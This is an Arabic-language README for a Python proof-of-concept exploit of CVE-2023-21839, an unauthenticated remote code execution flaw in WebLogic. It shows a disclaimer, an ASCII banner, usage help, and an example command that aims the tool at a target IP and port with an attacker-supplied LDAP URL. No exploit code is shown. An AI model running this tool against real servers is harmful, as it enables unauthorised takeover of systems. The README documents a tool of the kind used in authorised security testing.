
استغلال إثبات المفهوم بلغة Python لـ CVE-2023-21839 يستهدف خوادم WebLogic عبر حقن LDAP لتنفيذ التعليمات البرمجية عن بُعد دون مصادقة.
بناءً على احتياجات خاصة، قمت بترجمة إصدار GO الخاص بـ 4ra1n إلى Python، شكرًا له!
يجب استخدام هذا البرنامج فقط لأغراض اختبار الأمان والبحث المصرح بها، يرجى من المستخدمين اتباع قانون الأمن السيبراني واستخدامه بشكل معقول.
أي سلوك غير قانوني مثل الهجمات غير المصرح بها من قبل المستخدم باستخدام هذه الأداة ليست مسؤولية المؤلف.
إعادة إنتاج vulhub: الرابط
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
